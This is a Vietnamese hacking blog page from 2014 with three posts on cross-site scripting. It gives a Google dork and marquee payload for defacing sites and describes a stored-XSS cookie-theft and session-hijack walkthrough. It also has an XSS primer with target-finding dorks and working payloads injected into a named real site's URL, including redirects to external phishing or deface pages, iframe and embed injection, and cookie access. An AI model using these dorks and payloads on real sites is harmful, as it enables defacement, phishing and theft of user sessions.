Showing posts with label XSS. Show all posts
Showing posts with label XSS. Show all posts

Friday, June 6, 2014

Deface Website marquee XSS Vulnerability

Deface Website marquee XSS Vulnerability

Dork : inurl:"/showcatrows.php?CategoryID="


Thêm <marquee><h1>Troller Team</marquee>  vào sau link, thế là xong :v


Cám ơn đã xem =))

Monday, May 26, 2014

XSS – Session-Hijacking demonstration

From Ceh.vn post by SliverWolf
1. XSS script

Tác dụng của đoạn code này là gửi cookie về thông qua GET method cho cái url được định trước…



2. Lưu trữ cookie được gửi đến

File này làm nhiệm vụ lưu trữ cookie được gửi đến từ method POST hay GET vào trong một file khác đã bị censored :3. Tiếp theo là chuyển nạn nhân đến Google (Lưu ý: file này phải được up lên host hỗ trợ PHP)

[Hình: Untitled.png]

Bây giờ, mình tìm target :v À, đây rồi :3
[Hình: Untitled10.png]

OK :3 giờ thì sao, ngồi chờ thời vậy ^^ Giỡn chứ vì mình là admin nên mình vô ngay mục khách hàng và tự nhiên bị redirect qua Google :’(

Kiểm tra file cookie đã được lưu lại:
[Hình: Untitled4.png]

He he, giờ thì thử inject cái cookie chứa session của admin này vào coi. Network tool nhé các bác
[Hình: Untitled5.png]

Refresh và….end tut
[Hình: Untitled3.png]

LƯU Ý: đây chỉ là môt phần hại rất nhỏ của XSS thôi ^^ Cái này gọi là Persistent XSS vì nó tồn tại trong dữ liệu luôn, chỉ cần admin vào đúng phần có chèn script là bị mất cookie có chứa SESSION ngay :’(….

Wednesday, May 21, 2014

Giới thiệu Chung về XSS và Phương pháp kiểm tra lỗi

1- XSS là gì ?

XSS( Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.



2- Nguyên lý hoạt động XSS

Khi website đã bị chèn các thẻ html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy victim tùy vào mệnh lệnh của hacker

3- Phân loại XSS


XSS Có 2 dạng, đó là:

+ Persistent
+ Non-Persistent type

4- Mức độ nguy hiểm XSS

+ Ăn cắp cookies, mật khẩu, cướp session làm việc
+ Cài các loại virus, trojan, backdoor trên máy tính victim
+ Deface website. Tuy nhiên nó chỉ chạy trên trình duyệt phía client và chỉ tấn công vào bề mặt website, không làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.


5- Phương pháp check site dính lỗ hổng XSS
Bước 1: Sử dụng các dork sau để tìm kiếm trên google
inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx
inurl:?keyword=
inurl:?search=
Bước 2: Check lỗi XSS
- Để check 1 site dính lỗi xss, thông thường ta thêm đoạn script sau <script>alert(“XSS”)</script> . Nếu thấy nó xuất hiện 1 khung thông báo thì site đó đã dính lỗi XSS và attacker có thể sử dụng XSS để chiếm quyền điều khiển hay thực thi những mục đích khác.

http://www.liveattheblueolive.com/calendar.php?month=January&year=2010<script>alert("Check By Error69")</script>

- Tuy nhiên đối với 1 số site cần phải bypass bộ lọc khi thực hiện tấn công bằng XSS. Phần này Soleil sẽ đề cập trong bài sau.

- Ngoài các đoạn mã script attacker cũng có thể chèn vào các thẻ html như sau:

"><body bgcolor="FF0000"></body>
"><iframe src="www.vhbgroup.net" height=800 width=800 frameborder=1 align=center></iframe>

- Tool scanner XSS
updating.....

6- 1 số thao tác khi tấn công bằng XSS
- Trỏ về 1 trang fishing hoặc 1 hình ảnh deface
http://www.liveattheblueolive.com/calendar.php?month=January&year=2010<script>location="http://www.ndjsw.gov.cn/soleil.html";</script>

http://www.liveattheblueolive.com/calendar.php?month=January&year=2010<script>window.location="http://np9.upanh.com/b3.s30.d2/75b5d01fec6c8b0e20416cfb65901add_48010539.vhbgroup.png";</script>

- Chèn ảnh vào nội dung website.
<img src=" http://np9.upanh.com/b3.s30.d2/75b5d01fec6c8b0e20416cfb65901add_48010539.vhbgroup.png">




- Chèn 1 video vào nội dung site
<EMBED SRC="http://vhbgroup.net/soleil.swf"
- Đánh cắp thông tin
<script>alert(document.cookie);</script>